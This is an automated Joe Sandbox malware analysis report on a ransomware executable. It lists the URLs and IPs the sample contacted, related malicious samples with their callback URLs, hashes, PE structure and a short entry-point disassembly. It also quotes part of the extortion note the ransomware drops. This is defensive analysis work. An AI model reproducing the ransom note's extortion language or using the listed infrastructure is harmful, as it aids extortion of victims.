                                                                                                                          https://menexa4papers.trade/tS9P6wPz9x.exe, 00000000.00000003.533049801.0000000000BED000.00000004.00000001.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          unknown
                                                                                                                          https://www.binder-buerotechnik.at/wp-content/plugins/cookie-notice/css/front.min.css?ver=5.4.4tS9P6wPz9x.exe, 00000000.00000003.458962661.0000000000BCF000.00000004.00000001.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          unknown
                                                                                                                          https://youbysia.com.autS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          unknown
                                                                                                                          https://youbysia.com.au/promotiontS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          unknown
                                                                                                                          https://youbysia.com.au/wp-content/uploads/2020/07/afterpay.pngtS9P6wPz9x.exe, 00000000.00000003.552336995.000000000391A000.00000004.00000001.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          unknown
                                                                                                                          https://youbysia.com.au/by-skin-condition/unwanted-hair/tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          unknown
                                                                                                                          https://bbsmobler.se/W:StS9P6wPz9x.exe, 00000000.00000003.466766008.0000000000BFC000.00000004.00000001.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          unknown
                                                                                                                          https://dontpassthepepper.com/wp-content/tmp/mitn.jpgttS9P6wPz9x.exe, 00000000.00000003.466766008.0000000000BFC000.00000004.00000001.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          unknown
                                                                                                                          https://bbylegacy.com/tS9P6wPz9x.exe, 00000000.00000003.475105112.0000000000BDA000.00000004.00000001.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          unknown
                                                                                                                          https://you-by-sia.myshopify.com/collections/cleanserstS9P6wPz9x.exe, 00000000.00000003.552336995.000000000391A000.00000004.00000001.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          unknown
                                                                                                                          https://you-bysia.com.au:443/uploads/graphic/femvpu.pngtS9P6wPz9x.exe, 00000000.00000003.552472095.0000000000BEF000.00000004.00000001.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          unknown
                                                                                                                          https://youbysia.com.au/wp-content/themes/youbysia/css/bootstrap.min.css?ver=5.4.4tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          unknown
                                                                                                                          https://digivod.de/wp-includes/css/dist/block-library/style.min.css?ver=5.6.1tS9P6wPz9x.exe, 00000000.00000003.515274231.00000000038C1000.00000004.00000001.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          unknown
                                                                                                                          https://narcert.comtS9P6wPz9x.exe, 00000000.00000003.463616465.0000000000C06000.00000004.00000001.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          unknown
                                                                                                                          https://youbysia.com.au/wp-content/uploads/2020/06/1.pngtS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          unknown
                                                                                                                          https://www.365questions.org/wp-json/tS9P6wPz9x.exe, 00000000.00000003.508365201.00000000038EA000.00000004.00000001.sdmptrue
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          unknown
                                                                                                                          https://www.maratonaclubedeportugal.com/wp-includes/css/dist/block-library/style.min.csstS9P6wPz9x.exe, 00000000.00000003.492431696.00000000038CC000.00000004.00000001.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          unknown
                                                                                                                          https://huehnerauge-entfernen.de/comments/feed/tS9P6wPz9x.exe, 00000000.00000003.552769617.00000000038EA000.00000004.00000001.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          unknown
                                                                                                                          https://www.maratonaclubedeportugal.com/wp-content/themes/maratonas/js/special-slider.jstS9P6wPz9x.exe, 00000000.00000003.492431696.00000000038CC000.00000004.00000001.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          unknown
                                                                                                                          https://365questions.org/tS9P6wPz9x.exe, 00000000.00000003.508481116.0000000000BEF000.00000004.00000001.sdmptrue
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          unknown
                                                                                                                          https://www.365questions.org/wp-content/uploads/2019/06/cropped-favicon365-180x180.pngtS9P6wPz9x.exe, 00000000.00000003.508365201.00000000038EA000.00000004.00000001.sdmptrue
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          unknown
                                                                                                                          https://youbysia.com.au/by-treatment/skin-treatments/tS9P6wPz9x.exe, 00000000.00000003.552336995.000000000391A000.00000004.00000001.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          unknown
                                                                                                                          https://secureservercdn.nettS9P6wPz9x.exe, 00000000.00000003.463616465.0000000000C06000.00000004.00000001.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          unknown
                                                                                                                          https://huehnerauge-entfernen.de/tS9P6wPz9x.exe, 00000000.00000003.537209069.0000000000C0E000.00000004.00000001.sdmp, tS9P6wPz9x.exe, 00000000.00000003.552769617.00000000038EA000.00000004.00000001.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          unknown
                                                                                                                          https://www.binder-buerotechnik.at/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/tS9P6wPz9x.exe, 00000000.00000003.458962661.0000000000BCF000.00000004.00000001.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          unknown
                                                                                                                          https://www.365questions.org/wp-content/uploads/2019/06/cropped-favicon365-270x270.pngtS9P6wPz9x.exe, 00000000.00000003.508365201.00000000038EA000.00000004.00000001.sdmptrue
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          unknown
                                                                                                                          https://bookings.gettimely.com/youbysia/booktS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpfalse
                                                                                                                            high
                                                                                                                            https://www.maratonaclubedeportugal.com/wp-content/themes/maratonas/fonts/avenir/style.csstS9P6wPz9x.exe, 00000000.00000003.492431696.00000000038CC000.00000004.00000001.sdmpfalse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            unknown
                                                                                                                            https://digivod.de/feed/tS9P6wPz9x.exe, 00000000.00000003.515274231.00000000038C1000.00000004.00000001.sdmpfalse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            unknown
                                                                                                                            https://narcert.com/feed/tS9P6wPz9x.exe, 00000000.00000003.463616465.0000000000C06000.00000004.00000001.sdmpfalse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            unknown
                                                                                                                            https://youbysia.com.au/body-toning/tS9P6wPz9x.exe, 00000000.00000003.552336995.000000000391A000.00000004.00000001.sdmp, tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpfalse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            unknown
                                                                                                                            https://bbsmobler.se:443/static/assets/ugdl.pngtS9P6wPz9x.exe, 00000000.00000003.494465726.0000000000BEF000.00000004.00000001.sdmpfalse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            unknown
                                                                                                                            https://youbysia.com.au/wp-content/themes/youbysia/css/owl.carousel.min.css?ver=5.4.4tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpfalse
                                                                                                                            • Avira URL Cloud: safe

                                                                                                                              Contacted IPs


                                                                                                                              Public


                                                                                                                              Private

                                                                                                                              IP
                                                                                                                              192.168.2.1

                                                                                                                              General Information

Joe Sandbox Version: 31.0.0 Emerald
Analysis ID: 353325
Start date: 16.02.2021
Start time: 04:28:38
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 6m 53s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: tS9P6wPz9x (renamed file extension from none to exe)
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed: 37
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.rans.evad.winEXE@2/2@46/38
EGA Information:
• Successful, ratio: 100%
HDC Information:
• Successful, ratio: 99.3% (good quality ratio 95.4%)
• Quality average: 86.6%
• Quality standard deviation: 25.1%
HCA Information: Failed
Cookbook Comments:
• Adjust boot time
• Enable AMSI
Warnings:
                                                                                                                              • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                                                                                                                              • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, VSSVC.exe, svchost.exe, UsoClient.exe, wuapihost.exe
                                                                                                                              • Excluded IPs from analysis (whitelisted): 52.147.198.201, 13.64.90.137, 51.11.168.160, 23.218.208.56, 92.122.213.194, 92.122.213.247, 20.54.26.129, 8.248.123.254, 8.253.208.113, 8.248.113.254, 8.248.97.254, 8.248.135.254, 51.104.139.180, 52.155.217.156
                                                                                                                              • Excluded domains from analysis (whitelisted): displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, arc.msn.com.nsatc.net, fs.microsoft.com, ris-prod.trafficmanager.net, displaycatalog.md.mp.microsoft.com.akadns.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, blobcollector.events.data.trafficmanager.net, audownload.windowsupdate.nsatc.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, auto.au.download.windowsupdate.com.c.footprint.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net
                                                                                                                              • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                              • Report size getting too big, too many NtQueryDirectoryFile calls found.
                                                                                                                              • Report size getting too big, too many NtQueryVolumeInformationFile calls found.

                                                                                                                              Simulations

                                                                                                                              Behavior and APIs

Time | Type | Description
04:31:24 | API Interceptor | 36x Sleep call for process: tS9P6wPz9x.exe modified

                                                                                                                              Joe Sandbox View / Context

                                                                                                                              IPs

                                                                                                                                                          Purchase Order _pdf.exeGet hashmaliciousBrowse
                                                                                                                                                          • www.danddprecision.com/bft/?Prv=OGlPXFTt5c6kxeLYVW5LBZDyhMW+KQODTlBdu8FJ+UYArNz7vRGg6oRSqDpBq/unIysK&FXfT=xxo8
                                                                                                                                                          SCAN_PO210205.exe.exeGet hashmaliciousBrowse
                                                                                                                                                          • www.efrenjose.com/2kf/?ndfh-n=U48pk&KdrL=20tHWxr/h4Wknt5aV13cYmKSCaFY8th82zPxdAwakCdX0pH1Wj2V7oMvPHFiuwXJIyDi
                                                                                                                                                          PO 213409701.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • www.digitalcreativeclass.com/oean/?rFQt=6sgdKtaqC8V47ukfHKoxaa5O0zjTcMbm8vEzAl1gRIVGfX/pJ9M2Cv6aX0HoWJ4A5SQpIA==&rF=9rbPKz
                                                                                                                                                          Docs.exeGet hashmaliciousBrowse
                                                                                                                                                          • www.evolutionhvac.net/mph/?BXnXAP=YrhH0RRxT8EL1Dl0&2d8=xN8MOsJpq2DFXMAoP8BNIZU3pxvmACeI7QBEYfYdwwTaJ/23XAd4ioB5ckz1lQjNeAUM
                                                                                                                                                          gRd8HGFpL7.exeGet hashmaliciousBrowse
                                                                                                                                                          • www.oregonpyramids.com/kgw/?8pBp5p=pdBdC5tdun4cffgEHtq+oT66ngN5bOGUiz5GAqC1yXBzbo2Jq1SNmpaY9JqRuK454mmp0ITrCQ==&LXPL=yvqlQXkhnxmxPrbP
                                                                                                                                                          DHL eShipment invoice_pdf.exeGet hashmaliciousBrowse
                                                                                                                                                          • www.n1nte.net/u2km/?Mvmx=tPHpaK51d+uYhXrqvFsmXFuIGRWc9WD9KN+1CQ/75pScFacowZiqOdthokooXC42kXav&_PXh=xxlLi
                                                                                                                                                          SPARE PARTS Drawing.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • www.5037adairway.com/oean/?_nO8YB8=UDbslJBy3+2Qj9r7vZMgD4X+MNMiKzOXjqs7zZj0KYuc4U4K27OQ1LFZ29UXWT/nO2CUPQ==&bxlp=FXj0mNuHShDtDjI
                                                                                                                                                          SAMSUNG C&T UPCOMING PROJECTS19-MP.exe.exeGet hashmaliciousBrowse
                                                                                                                                                          • www.insuranceforgrass.com/cdl/?Mfg=A1H4xQi7nCm4dsaHHTQB+ENJ75eaR8btr5AllEXDgRUKTVrPlhERhFG7xWxWp9ft1f2F&uVxpj=ojO0dJYX1B
                                                                                                                                                          Y1nW4ALZw1.exeGet hashmaliciousBrowse
                                                                                                                                                          • www.verifiedcunt.com/kre/?cxldE=yxl0dJPHqj8&JXULWR=IMsO5okpi9Fp8F/B1QScyQ2LxgcSCKH4dHPEcXqgOB9vSUTkbECvYaixa9i0AFa1qwTu
                                                                                                                                                          Formbook.exeGet hashmaliciousBrowse
                                                                                                                                                          • www.pastormariorondon.com/kio8/?b6=3U2rUS347ly1IbXgq7tZhdLDMaydhU/HtmIgRF1H/YP6VnYJv47+xCHzWI5tv7kDrE81MnWOjw==&qR2=rTJtal-xeZQhH
                                                                                                                                                          KROS Sp. z.o.o.exeGet hashmaliciousBrowse
                                                                                                                                                          • www.73gardinerdrive.com/kio8/?EzrtzJ=apITk4789pRXUl&rZpXZ6=/LIpExDoPmeUPXsQIbtmWQ/mRzV4wyOAmYB7LcYP3aN/Hx+sZnhNUFyYoyV0aZ2g5S+Wl1G33g==

Domains

Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context

ASN

Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
                                                                                                                                                          • 185.2.4.18
                                                                                                                                                          HETZNER-ASDESecuriteInfo.com.Trojan.GenericKD.45718415.30898.exeGet hashmaliciousBrowse
                                                                                                                                                          • 95.216.103.250
                                                                                                                                                          zBiSBvGnBG.exeGet hashmaliciousBrowse
                                                                                                                                                          • 88.99.66.31
                                                                                                                                                          ransomware.exeGet hashmaliciousBrowse
                                                                                                                                                          • 144.76.225.204
                                                                                                                                                          ransomware.exeGet hashmaliciousBrowse
                                                                                                                                                          • 144.76.225.204
                                                                                                                                                          papers (50).xlsGet hashmaliciousBrowse
                                                                                                                                                          • 78.46.235.88
                                                                                                                                                          papers (50).xlsGet hashmaliciousBrowse
                                                                                                                                                          • 78.46.235.88
                                                                                                                                                          4ZuCvlXeSV.exeGet hashmaliciousBrowse
                                                                                                                                                          • 88.99.66.31
                                                                                                                                                          GRgtTxNL5b.exeGet hashmaliciousBrowse
                                                                                                                                                          • 88.99.66.31
                                                                                                                                                          SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exeGet hashmaliciousBrowse
                                                                                                                                                          • 94.130.16.32
                                                                                                                                                          SecuriteInfo.com.Trojan.GenericKD.43544658.14342.exeGet hashmaliciousBrowse
                                                                                                                                                          • 88.99.66.31
                                                                                                                                                          VqkQXrEMkv.binGet hashmaliciousBrowse
                                                                                                                                                          • 135.181.198.146
                                                                                                                                                          SecuriteInfo.com.Trojan.GenericKD.45712415.20147.exeGet hashmaliciousBrowse
                                                                                                                                                          • 88.99.66.31
                                                                                                                                                          A6Qom7We0l.exeGet hashmaliciousBrowse
                                                                                                                                                          • 195.201.225.248
                                                                                                                                                          BHuuI8LETf.exeGet hashmaliciousBrowse
                                                                                                                                                          • 195.201.225.248
                                                                                                                                                          m1hholPLan.exeGet hashmaliciousBrowse
                                                                                                                                                          • 195.201.225.248
                                                                                                                                                          nyDyMJGKWD.exeGet hashmaliciousBrowse
                                                                                                                                                          • 195.201.225.248
                                                                                                                                                          SecuriteInfo.com.Trojan.PWS.Siggen2.61222.12968.exeGet hashmaliciousBrowse
                                                                                                                                                          • 88.99.66.31
                                                                                                                                                          Shipping Document PL&BL Draft (1).exeGet hashmaliciousBrowse
                                                                                                                                                          • 138.201.207.39
                                                                                                                                                          ZRz0Aq1Rf0.dllGet hashmaliciousBrowse
                                                                                                                                                          • 136.243.147.81
                                                                                                                                                          QpXze5wxqM.exeGet hashmaliciousBrowse
                                                                                                                                                          • 88.99.66.31

                                                                                                                                                          JA3 Fingerprints

Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
ce5f3254611a8c095a3d821d44539877 | zBiSBvGnBG.exe | malicious
ransomware.exe | malicious
ransomware.exe | malicious
tarifvertrag_einzelhandel_gehaltsgruppen_bayern.js | malicious
                                                                                                                                                          • 185.98.131.150
                                                                                                                                                          • 104.21.9.188
                                                                                                                                                          • 166.62.110.232
                                                                                                                                                          • 104.21.78.13
                                                                                                                                                          • 91.201.60.54
                                                                                                                                                          • 144.76.225.204
                                                                                                                                                          • 66.155.35.240
                                                                                                                                                          • 184.175.106.113
tarifvertrag_einzelhandel_gehaltsgruppen_bayern.js (malicious)
4ZuCvlXeSV.exe (malicious)
GRgtTxNL5b.exe (malicious)
BleachGap.exe (malicious)
A6Qom7We0l.exe (malicious)
                                                                                                                                                          • 104.21.78.13
                                                                                                                                                          • 91.201.60.54
                                                                                                                                                          • 144.76.225.204
                                                                                                                                                          • 66.155.35.240
                                                                                                                                                          • 184.175.106.113
BHuuI8LETf.exe (malicious)
m1hholPLan.exe (malicious)
nyDyMJGKWD.exe (malicious)
SecuriteInfo.com.Trojan.PWS.Siggen2.61222.12968.exe (malicious)
ZRz0Aq1Rf0.dll (malicious)
                                                                                                                                                          • 66.155.35.240
                                                                                                                                                          • 184.175.106.113
QpXze5wxqM.exe (malicious)
fmSEWxVZ1A.exe (malicious)
CeDOD6gY5R.exe (malicious)
HA2a7FagC6.exe (malicious)
MakYpSHZKE.exe (malicious)
lGJz5igIpb.exe (malicious)

                                                                                                                                                          Dropped Files

                                                                                                                                                          No context

                                                                                                                                                          Created / dropped Files

                                                                                                                                                          C:\4wfaj7427w-readme.txt
                                                                                                                                                          Process:C:\Users\user\Desktop\tS9P6wPz9x.exe
                                                                                                                                                          File Type:data
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):8140
                                                                                                                                                          Entropy (8bit):3.837132745420337
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:sL65De+s3jFmMlQKyuwhKWbQPGN9IhR9Pgd3o1DW:/e+iFmpRxIluHw9Pg7
                                                                                                                                                          MD5:53F6DD24C66DC8D19F9D0DAD02FAD9C9
                                                                                                                                                          SHA1:141442ACE97CE7DA64C34C52B0AAB131B3B22150
                                                                                                                                                          SHA-256:3C23E9EACD000A992CD2237CD1BC5550170DE8E8B7C8DC403A7527E554210B23
                                                                                                                                                          SHA-512:3CDBD1B246EAFF84BE51D15C2B367B7366B12D589D58E1C5928B11B41D8C3927ACE566A5662C9DB7D312D0E90660DAF66C1B35E46EB6A829A3F8910E72F0A816
                                                                                                                                                          Malicious:true
                                                                                                                                                          Reputation:low
Preview:
---=== Welcome. Again. ===---

---=== Welcome. Again. ===---

[+] Whats Happen? [+]

Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension 4wfaj7427w.
By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER).

[+] Data leak [+]

First of all we have uploaded more then 80 GB archived data from \\UDATA.

Example of data:
- Accounting
- Finance
                                                                                                                                                          C:\bootTel.dat
                                                                                                                                                          Process:C:\Users\user\Desktop\tS9P6wPz9x.exe
                                                                                                                                                          File Type:data
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):312
                                                                                                                                                          Entropy (8bit):7.333568715579559
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:6:ao3c9W/A+TStdKXqVcVit8iGYmaJ9fIGW7plXZ+LuPBoCF:aoA+9XqKVitNmmMplQa
                                                                                                                                                          MD5:700F1CDC1C2BC0EC2B71B3EEEF90D939
                                                                                                                                                          SHA1:D57440CF23F627B24367B9351E28BE72C7677299
                                                                                                                                                          SHA-256:6CF33DE5A44A3639C84A65E2B3A3AA4D8AE4896AD551874046B25AAE7500D49F
                                                                                                                                                          SHA-512:BDCCC48FC2CCD17010FDE795149783DD3B648101A1F544D7FDF1A07728346FBD7632B5347D8A03E5FD85FBBFA75603D1C425D012D2AB1F67A2169901C94E8242
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview: ...HWx2_..Y.R..7?....l.l.f.l.PXn......1.Q.l.;.........%.GZ..D.4......vc..M...vL...N.....8.....L.S..6..b.&....:./.Q..u1...8@..t_.Z.....$5=.6...8i..a..`xP~p.q..c...xx-.\~.e.AO.6...6.=6n....Q......J.....I.....C39...._...D&.....r.....q.P.F...\..;o. .V=1...[..u..K....c..q=...s..E.c.6......w.........vn+.

                                                                                                                                                          Static File Info

                                                                                                                                                          General

                                                                                                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                          Entropy (8bit):6.677816193182115
                                                                                                                                                          TrID:
                                                                                                                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                          File name:tS9P6wPz9x.exe
                                                                                                                                                          File size:120832
                                                                                                                                                          MD5:39d22b8f3da4a83cd957f324f2423309
                                                                                                                                                          SHA1:70baae39f80e8917a71353110bb85e797e23524a
                                                                                                                                                          SHA256:c8c169ad2628ff3860c4d0bd04afeb81262051f664f9d5a334c32c78e791a7f8
                                                                                                                                                          SHA512:293ac35141e885e685b7ba588fea2ba84ece78441dea9c9b3e28d584923dc9ab0605016244d3f95dec56e49c701a9e19d006e8d5d3604a3423ed167b236a7ecd
                                                                                                                                                          SSDEEP:1536:pRGfmACfvCHeQ5EJRDKiMIfB6Ym5p/eyxICS4AxpoC3/0b2zAmQF6rkyM3/Z:omRj6YaWm8/0b49QIM3
                                                                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........:...[.[.[.[.[.[...Z.[.[...Z.[.[...Z.[.[\..[.[.[\..[.[.[.[.[.[.[\..[.[.[...Z.[.[...Z.[.[Rich.[.[................PE..L...1g._...

                                                                                                                                                          File Icon

                                                                                                                                                          Icon Hash:00828e8e8686b000

                                                                                                                                                          Static PE Info

                                                                                                                                                          General

                                                                                                                                                          Entrypoint:0x404274
                                                                                                                                                          Entrypoint Section:.text
                                                                                                                                                          Digitally signed:false
                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                          Subsystem:windows gui
                                                                                                                                                          Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                                                                                                          DLL Characteristics:TERMINAL_SERVER_AWARE, DYNAMIC_BASE
                                                                                                                                                          Time Stamp:0x5FFC6731 [Mon Jan 11 14:56:49 2021 UTC]
                                                                                                                                                          TLS Callbacks:
                                                                                                                                                          CLR (.Net) Version:
                                                                                                                                                          OS Version Major:5
                                                                                                                                                          OS Version Minor:1
                                                                                                                                                          File Version Major:5
                                                                                                                                                          File Version Minor:1
                                                                                                                                                          Subsystem Version Major:5
                                                                                                                                                          Subsystem Version Minor:1
                                                                                                                                                          Import Hash:63fe86338b92e2aba319c5d54ac4e1c7

                                                                                                                                                          Entrypoint Preview

                                                                                                                                                          Instruction
                                                                                                                                                          push 00000000h
                                                                                                                                                          call 00007F056473BB5Fh
                                                                                                                                                          push 00000000h
                                                                                                                                                          call 00007F056473C52Dh
                                                                                                                                                          pop ecx
                                                                                                                                                          ret
                                                                                                                                                          push ebp
                                                                                                                                                          mov ebp, esp
                                                                                                                                                          sub esp, 2Ch
                                                                                                                                                          lea eax, dword ptr [ebp-2Ch]
                                                                                                                                                          push esi
                                                                                                                                                          push eax
                                                                                                                                                          push 00000018h
                                                                                                                                                          pop esi
                                                                                                                                                          push esi
                                                                                                                                                          push dword ptr [ebp+08h]
                                                                                                                                                          call dword ptr [00411194h]
                                                                                                                                                          test eax, eax
                                                                                                                                                          je 00007F056473BD86h
                                                                                                                                                          mov eax, dword ptr [ebp-1Ah]
                                                                                                                                                          imul eax, dword ptr [ebp-1Ch]
                                                                                                                                                          push ebx
                                                                                                                                                          push edi
                                                                                                                                                          xor edi, edi
                                                                                                                                                          inc edi
                                                                                                                                                          movzx eax, ax
                                                                                                                                                          cmp ax, di
                                                                                                                                                          jne 00007F056473BBF6h
                                                                                                                                                          mov ebx, edi
                                                                                                                                                          jmp 00007F056473BC18h
                                                                                                                                                          push 00000004h
                                                                                                                                                          pop ebx
                                                                                                                                                          cmp ax, bx
                                                                                                                                                          jbe 00007F056473BC10h
                                                                                                                                                          push 00000008h
                                                                                                                                                          pop ebx
                                                                                                                                                          cmp ax, bx
                                                                                                                                                          jbe 00007F056473BC08h
                                                                                                                                                          push 00000010h
                                                                                                                                                          pop ebx
                                                                                                                                                          cmp ax, bx
                                                                                                                                                          jbe 00007F056473BC00h
                                                                                                                                                          cmp ax, si
                                                                                                                                                          jnbe 00007F056473BBF8h
                                                                                                                                                          mov ebx, esi
                                                                                                                                                          push 00000028h
                                                                                                                                                          jmp 00007F056473BC03h
                                                                                                                                                          push 00000020h
                                                                                                                                                          pop ebx
                                                                                                                                                          mov eax, edi
                                                                                                                                                          mov cl, bl
                                                                                                                                                          shl eax, cl
                                                                                                                                                          lea eax, dword ptr [00000028h+eax*4]
                                                                                                                                                          push eax
                                                                                                                                                          push 00000040h
                                                                                                                                                          call dword ptr [00411150h]
                                                                                                                                                          mov esi, eax
                                                                                                                                                          push 00000018h
                                                                                                                                                          mov dword ptr [esi], 00000028h
                                                                                                                                                          mov eax, dword ptr [ebp-28h]
                                                                                                                                                          mov dword ptr [esi+04h], eax
                                                                                                                                                          mov eax, dword ptr [ebp-24h]
                                                                                                                                                          mov dword ptr [esi+08h], eax
                                                                                                                                                          mov ax, word ptr [ebp-1Ch]
                                                                                                                                                          mov word ptr [esi+0Ch], ax
                                                                                                                                                          mov ax, word ptr [ebp-1Ah]
                                                                                                                                                          mov word ptr [esi+0Eh], ax
                                                                                                                                                          pop eax
                                                                                                                                                          cmp bx, ax
                                                                                                                                                          jnc 00007F056473BBF9h
                                                                                                                                                          mov cl, bl
                                                                                                                                                          shl edi, cl
                                                                                                                                                          mov dword ptr [esi+20h], edi
                                                                                                                                                          mov eax, dword ptr [esi+04h]
                                                                                                                                                          xor edi, edi
                                                                                                                                                          add eax, 07h
                                                                                                                                                          movzx ecx, bx
                                                                                                                                                          cdq
                                                                                                                                                          and edx, 07h
                                                                                                                                                          mov dword ptr [esi+00h], edi

                                                                                                                                                          Rich Headers

                                                                                                                                                          Programming Language:
                                                                                                                                                          • [LNK] VS2015 UPD3.1 build 24215
                                                                                                                                                          • [ C ] VS2015 UPD3.1 build 24215

                                                                                                                                                          Data Directories

Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0xfc10           0x50          .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x0              0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x20000          0x6e4         .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0xd000           0x48          .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0

                                                                                                                                                          Sections

Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity  File Type  Entropy        Characteristics
.text   0x1000           0xb724        0xb800    False     0.575789741848   data       6.55537865144  IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata  0xd000           0x2d90        0x2e00    False     0.677394701087   data       7.83726703156  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
